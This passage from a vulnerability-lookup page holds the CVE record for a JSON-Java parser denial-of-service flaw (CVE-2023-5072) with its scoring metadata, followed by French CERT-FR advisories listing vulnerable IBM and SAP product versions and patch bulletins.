Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2023-5072 (GCVE-0-2023-5072)
Vulnerability from cvelistv5 – Published: 2023-10-12 16:13 – Updated: 2025-02-13 17:19
VLAI
EPSS
Title
DoS Vulnerability in JSON-Java
Summary
Denial of Service in JSON-Java versions up to and including 20230618. A bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used.
Severity
7.5 (High)
CWE
- CWE-770 - Allocation of Resources Without Limits or Throttling
Assigner
References
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| https://github.com/stleary/JSON-java | n/a |
Affected:
0 , ≤ 20230618
(date)
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T07:44:53.789Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://github.com/stleary/JSON-java/issues/758"
},
{
"tags": [
"x_transferred"
],
"url": "https://github.com/stleary/JSON-java/issues/771"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2023/12/13/4"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20240621-0007/"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-5072",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-11-21T16:23:55.801589Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-11-21T16:24:03.711Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "n/a",
"vendor": "https://github.com/stleary/JSON-java",
"versions": [
{
"lessThanOrEqual": "20230618",
"status": "affected",
"version": "0",
"versionType": "date"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eDenial of Service in \u003c/span\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eJSON-Java versions up to and including 20230618. \u0026nbsp;\u003c/span\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eA bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used.\u003c/span\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003e\u0026nbsp;\u003c/span\u003e\u003cbr\u003e"
}
],
"value": "Denial of Service in JSON-Java versions up to and including 20230618. \u00a0A bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used."
}
],
"impacts": [
{
"capecId": "CAPEC-197",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-197 Exponential Data Expansion"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-770",
"description": "CWE-770 Allocation of Resources Without Limits or Throttling",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-21T19:08:23.050Z",
"orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"shortName": "Google"
},
"references": [
{
"url": "https://github.com/stleary/JSON-java/issues/758"
},
{
"url": "https://github.com/stleary/JSON-java/issues/771"
},
{
"url": "http://www.openwall.com/lists/oss-security/2023/12/13/4"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240621-0007/"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "DoS Vulnerability in JSON-Java",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"assignerShortName": "Google",
"cveId": "CVE-2023-5072",
"datePublished": "2023-10-12T16:13:27.974Z",
"dateReserved": "2023-09-19T18:29:03.608Z",
"dateUpdated": "2025-02-13T17:19:28.975Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2023-5072",
"date": "2026-05-27",
"epss": "0.00677",
"percentile": "0.71771"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2023-5072\",\"sourceIdentifier\":\"cve-coordination@google.com\",\"published\":\"2023-10-12T17:15:10.187\",\"lastModified\":\"2025-09-19T18:54:20.100\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Denial of Service in JSON-Java versions up to and including 20230618. \u00a0A bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used.\"},{\"lang\":\"es\",\"value\":\"Denegaci\u00f3n de Servicio (DoS) en versiones JSON-Java hasta 20230618 incluida. Un error en el analizador significa que una cadena de entrada de tama\u00f1o modesto puede provocar el uso de cantidades indefinidas de memoria.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"cve-coordination@google.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"cve-coordination@google.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-770\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-770\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:stleary:json-java:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"20230618\",\"matchCriteriaId\":\"5F4DB239-5ADA-4158-9B78-65672A05D31B\"}]}]}],\"references\":[{\"url\":\"http://www.openwall.com/lists/oss-security/2023/12/13/4\",\"source\":\"cve-coordination@google.com\"},{\"url\":\"https://github.com/stleary/JSON-java/issues/758\",\"source\":\"cve-coordination@google.com\",\"tags\":[\"Issue Tracking\"]},{\"url\":\"https://github.com/stleary/JSON-java/issues/771\",\"source\":\"cve-coordination@google.com\",\"tags\":[\"Exploit\",\"Issue Tracking\"]},{\"url\":\"https://security.netapp.com/advisory/ntap-20240621-0007/\",\"source\":\"cve-coordination@google.com\"},{\"url\":\"http://www.openwall.com/lists/oss-security/2023/12/13/4\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://github.com/stleary/JSON-java/issues/758\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Issue Tracking\"]},{\"url\":\"https://github.com/stleary/JSON-java/issues/771\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Issue Tracking\"]},{\"url\":\"https://security.netapp.com/advisory/ntap-20240621-0007/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://github.com/stleary/JSON-java/issues/758\", \"tags\": [\"x_transferred\"]}, {\"url\": \"https://github.com/stleary/JSON-java/issues/771\", \"tags\": [\"x_transferred\"]}, {\"url\": \"http://www.openwall.com/lists/oss-security/2023/12/13/4\", \"tags\": [\"x_transferred\"]}, {\"url\": \"https://security.netapp.com/advisory/ntap-20240621-0007/\", \"tags\": [\"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-02T07:44:53.789Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2023-5072\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-11-21T16:23:55.801589Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-11-21T16:23:59.532Z\"}}], \"cna\": {\"title\": \"DoS Vulnerability in JSON-Java\", \"source\": {\"discovery\": \"UNKNOWN\"}, \"impacts\": [{\"capecId\": \"CAPEC-197\", \"descriptions\": [{\"lang\": \"en\", \"value\": \"CAPEC-197 Exponential Data Expansion\"}]}], \"metrics\": [{\"format\": \"CVSS\", \"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}, \"scenarios\": [{\"lang\": \"en\", \"value\": \"GENERAL\"}]}], \"affected\": [{\"vendor\": \"https://github.com/stleary/JSON-java\", \"product\": \"n/a\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"versionType\": \"date\", \"lessThanOrEqual\": \"20230618\"}], \"defaultStatus\": \"unaffected\"}], \"references\": [{\"url\": \"https://github.com/stleary/JSON-java/issues/758\"}, {\"url\": \"https://github.com/stleary/JSON-java/issues/771\"}, {\"url\": \"http://www.openwall.com/lists/oss-security/2023/12/13/4\"}, {\"url\": \"https://security.netapp.com/advisory/ntap-20240621-0007/\"}], \"x_generator\": {\"engine\": \"Vulnogram 0.1.0-dev\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"Denial of Service in JSON-Java versions up to and including 20230618. \\u00a0A bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used.\", \"supportingMedia\": [{\"type\": \"text/html\", \"value\": \"\u003cspan style=\\\"background-color: rgb(255, 255, 255);\\\"\u003eDenial of Service in \u003c/span\u003e\u003cspan style=\\\"background-color: rgb(255, 255, 255);\\\"\u003eJSON-Java versions up to and including 20230618. \u0026nbsp;\u003c/span\u003e\u003cspan style=\\\"background-color: rgb(255, 255, 255);\\\"\u003eA bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used.\u003c/span\u003e\u003cspan style=\\\"background-color: rgb(255, 255, 255);\\\"\u003e\u0026nbsp;\u003c/span\u003e\u003cbr\u003e\", \"base64\": false}]}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-770\", \"description\": \"CWE-770 Allocation of Resources Without Limits or Throttling\"}]}], \"providerMetadata\": {\"orgId\": \"14ed7db2-1595-443d-9d34-6215bf890778\", \"shortName\": \"Google\", \"dateUpdated\": \"2024-06-21T19:08:23.050Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2023-5072\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-02-13T17:19:28.975Z\", \"dateReserved\": \"2023-09-19T18:29:03.608Z\", \"assignerOrgId\": \"14ed7db2-1595-443d-9d34-6215bf890778\", \"datePublished\": \"2023-10-12T16:13:27.974Z\", \"assignerShortName\": \"Google\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
CERTFR-2025-AVI-0255
Vulnerability from certfr_avis - Published: 2025-03-28 - Updated: 2025-03-28
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | QRadar SIEM | QRadar SIEM versions 7.5.x antérieures à 7.5.0 UP11 IF02 | ||
| IBM | WebSphere | WebSphere Application Server Liberty versions 17.0.0.3 à 25.0.x antérieures à 25.0.0.3 sans le correctif PH65394 ou antérieures à 25.0.0.4 (disponible au deuxième trimestre 2025) | ||
| IBM | Sterling | Sterling Connect:Direct pour HP NonStop versions 3.6.x antérieures à 3.6.0.6 iFix000 | ||
| IBM | Sterling Control Center | Sterling Control Center versions 6.2.1.x antérieures à 6.2.1.0 iFix15 | ||
| IBM | Sterling Control Center | Sterling Control Center versions 6.3.1.x antérieures à 6.3.1.0 iFix04 |
References
| Title | Publication Time | Tags | |||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "QRadar SIEM versions 7.5.x ant\u00e9rieures \u00e0 7.5.0 UP11 IF02",
"product": {
"name": "QRadar SIEM",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Application Server Liberty versions 17.0.0.3 \u00e0 25.0.x ant\u00e9rieures \u00e0 25.0.0.3 sans le correctif PH65394 ou ant\u00e9rieures \u00e0 25.0.0.4 (disponible au deuxi\u00e8me trimestre 2025)",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct pour HP NonStop versions 3.6.x ant\u00e9rieures \u00e0 3.6.0.6 iFix000",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Control Center versions 6.2.1.x ant\u00e9rieures \u00e0 6.2.1.0 iFix15",
"product": {
"name": "Sterling Control Center",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Control Center versions 6.3.1.x ant\u00e9rieures \u00e0 6.3.1.0 iFix04",
"product": {
"name": "Sterling Control Center",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2024-50142",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50142"
},
{
"name": "CVE-2023-33201",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-33201"
},
{
"name": "CVE-2022-45688",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-45688"
},
{
"name": "CVE-2024-50275",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50275"
},
{
"name": "CVE-2022-4304",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-4304"
},
{
"name": "CVE-2023-0215",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0215"
},
{
"name": "CVE-2023-0286",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0286"
},
{
"name": "CVE-2023-26049",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26049"
},
{
"name": "CVE-2024-50192",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50192"
},
{
"name": "CVE-2023-5072",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5072"
},
{
"name": "CVE-2024-50082",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50082"
},
{
"name": "CVE-2024-53122",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53122"
},
{
"name": "CVE-2024-26935",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26935"
},
{
"name": "CVE-2024-50264",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50264"
},
{
"name": "CVE-2023-36478",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-36478"
},
{
"name": "CVE-2024-53088",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53088"
},
{
"name": "CVE-2023-28439",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28439"
},
{
"name": "CVE-2024-46695",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46695"
},
{
"name": "CVE-2024-49949",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49949"
},
{
"name": "CVE-2024-50099",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50099"
},
{
"name": "CVE-2023-40167",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-40167"
},
{
"name": "CVE-2023-41900",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-41900"
},
{
"name": "CVE-2025-23184",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23184"
},
{
"name": "CVE-2023-36479",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-36479"
},
{
"name": "CVE-2024-50256",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50256"
},
{
"name": "CVE-2023-26048",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26048"
},
{
"name": "CVE-2024-50110",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50110"
},
{
"name": "CVE-2024-3661",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-3661"
}
],
"initial_release_date": "2025-03-28T00:00:00",
"last_revision_date": "2025-03-28T00:00:00",
"links": [],
"reference": "CERTFR-2025-AVI-0255",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-03-28T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-03-24",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7228857",
"url": "https://www.ibm.com/support/pages/node/7228857"
},
{
"published_at": "2025-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7184085",
"url": "https://www.ibm.com/support/pages/node/7184085"
},
{
"published_at": "2025-03-26",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7229079",
"url": "https://www.ibm.com/support/pages/node/7229079"
},
{
"published_at": "2025-03-28",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7229377",
"url": "https://www.ibm.com/support/pages/node/7229377"
},
{
"published_at": "2025-03-24",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7228856",
"url": "https://www.ibm.com/support/pages/node/7228856"
}
]
}
CERTFR-2025-AVI-0764
Vulnerability from certfr_avis - Published: 2025-09-09 - Updated: 2025-09-09
De multiples vulnérabilités ont été découvertes dans les produits SAP. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| SAP | N/A | Fiori (Launchpad) version SAP_UI 754 sans le dernier correctif de sécurité | ||
| SAP | N/A | Supplier Relationship Management versions RM_SERVER 700, 701, 702, 713 et 714 sans le dernier correctif de sécurité | ||
| SAP | N/A | S/4HANA (Private Cloud or On-Premise) versions S4CORE 102, 103, 104, 105, 106, 107 et 108 sans le dernier correctif de sécurité | ||
| SAP | N/A | HCM (Approve Timesheets Fiori 2.0 application) version GBX01HR5 605 sans le dernier correctif de sécurité | ||
| SAP | N/A | NetWeaver AS Java (Adobe Document Service) version ADSSAP 7.50 sans le dernier correctif de sécurité | ||
| SAP | N/A | NetWeaver Application Server for ABAP versions SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758 et SAP_BASIS 816 sans le dernier correctif de sécurité | ||
| SAP | N/A | NetWeaver versions KRNL64NUC 7.22, 7.22EXT, KRNL64UC 7.22, 7.22EXT, 7.53, KERNEL 7.22, 7.53 et 7.54 sans le dernier correctif de sécurité | ||
| SAP | N/A | Netweaver (RMI-P4) version SERVERCORE 7.50 sans le dernier correctif de sécurité | ||
| SAP | N/A | NetWeaver Application Server Java version WD-RUNTIME 7.50 sans le dernier correctif de sécurité | ||
| SAP | N/A | Fiori app (Manage Payment Blocks) versions S4CORE 107 et 108 sans le dernier correctif de sécurité | ||
| SAP | N/A | NetWeaver AS Java (Deploy Web Service) version J2EE-APPS 7.50 sans le dernier correctif de sécurité | ||
| SAP | N/A | HCM (My Timesheet Fiori 2.0 application) version GBX01HR5 605 sans le dernier correctif de sécurité | ||
| SAP | N/A | NetWeaver and ABAP Platform (Service Data Collection) versions ST-PI 2008_1_700, 2008_1_710 et 740 sans le dernier correctif de sécurité | ||
| SAP | N/A | NetWeaver (Service Data Download) versions SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758 et SAP_BASIS 816 sans le dernier correctif de sécurité | ||
| SAP | N/A | NetWeaver AS Java (IIOP Service) version SERVERCORE 7.50 sans le dernier correctif de sécurité | ||
| SAP | N/A | NetWeaver Application Server for ABAP (Background Processing) versions SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758 et SAP_BASIS 816 sans le dernier correctif de sécurité | ||
| SAP | N/A | Commerce Cloud versions HY_COM 2205 et COM_CLOUD 2211 sans le dernier correctif de sécurité | ||
| SAP | N/A | NetWeaver AS for ABAP and ABAP Platform versions 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 756 et 757 sans le dernier correctif de sécurité | ||
| SAP | N/A | BusinessObjects Business Intelligence Platform versions ENTERPRISE 430, 2025 et 2027 sans le dernier correctif de sécurité | ||
| SAP | N/A | Business Planning and Consolidation versions BPC4HANA 200, 300, SAP_BW 750, 751, 752, 753, 754, 755, 756, 757, 758, 816, 914 et CPMBPC 810 sans le dernier correctif de sécurité | ||
| SAP | N/A | Fiori App (F4044 Manage Work Center Groups) versions UIS4HOP1 600, 700, 800 et 900 sans le dernier correctif de sécurité | ||
| SAP | N/A | Landscape Transformation Replication Server versions DMIS 2011_1_620, 2011_1_640, 2011_1_700, 2011_1_710, 2011_1_730, 2011_1_731, 2011_1_752 et 2020 sans le dernier correctif de sécurité | ||
| SAP | N/A | Business One (SLD) versions B1_ON_HANA 10.0 et SAP-M-BO 10.0 sans le dernier correctif de sécurité | ||
| SAP | N/A | NetWeaver ABAP Platform versions S4CRM 100, 200, 204, 205, 206, S4CEXT 109, BBPCRM 713 et 714 sans le dernier correctif de sécurité | ||
| SAP | N/A | Commerce Cloud and Datahub versions HY_COM 2205, HY_DHUB 2205, COM_CLOUD 2211 et DHUB_CLOUD 2211 sans le dernier correctif de sécurité |
References
| Title | Publication Time | Tags | |||
|---|---|---|---|---|---|
|
|||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Fiori (Launchpad) version SAP_UI 754 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "Supplier Relationship Management versions RM_SERVER 700, 701, 702, 713 et 714 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "S/4HANA (Private Cloud or On-Premise) versions S4CORE 102, 103, 104, 105, 106, 107 et 108 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "HCM (Approve Timesheets Fiori 2.0 application) version GBX01HR5 605 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "NetWeaver AS Java (Adobe Document Service) version ADSSAP 7.50 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "NetWeaver Application Server for ABAP versions SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758 et SAP_BASIS 816 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "NetWeaver versions KRNL64NUC 7.22, 7.22EXT, KRNL64UC 7.22, 7.22EXT, 7.53, KERNEL 7.22, 7.53 et 7.54 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "Netweaver (RMI-P4) version SERVERCORE 7.50 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "NetWeaver Application Server Java version WD-RUNTIME 7.50 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "Fiori app (Manage Payment Blocks) versions S4CORE 107 et 108 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "NetWeaver AS Java (Deploy Web Service) version J2EE-APPS 7.50 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "HCM (My Timesheet Fiori 2.0 application) version GBX01HR5 605 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "NetWeaver and ABAP Platform (Service Data Collection) versions ST-PI 2008_1_700, 2008_1_710 et 740 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "NetWeaver (Service Data Download) versions SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758 et SAP_BASIS 816 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "NetWeaver AS Java (IIOP Service) version SERVERCORE 7.50 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
"description": "NetWeaver Application Server for ABAP (Background Processing) versions SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, SAP_BASIS 740, SAP_BASIS 750, SAP_BASIS 751, SAP_BASIS 752, SAP_BASIS 753, SAP_BASIS 754, SAP_BASIS 755, SAP_BASIS 756, SAP_BASIS 757, SAP_BASIS 758 et SAP_BASIS 816 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "N/A",
"vendor": {
"name": "SAP",
"scada": false
}
}
},
{
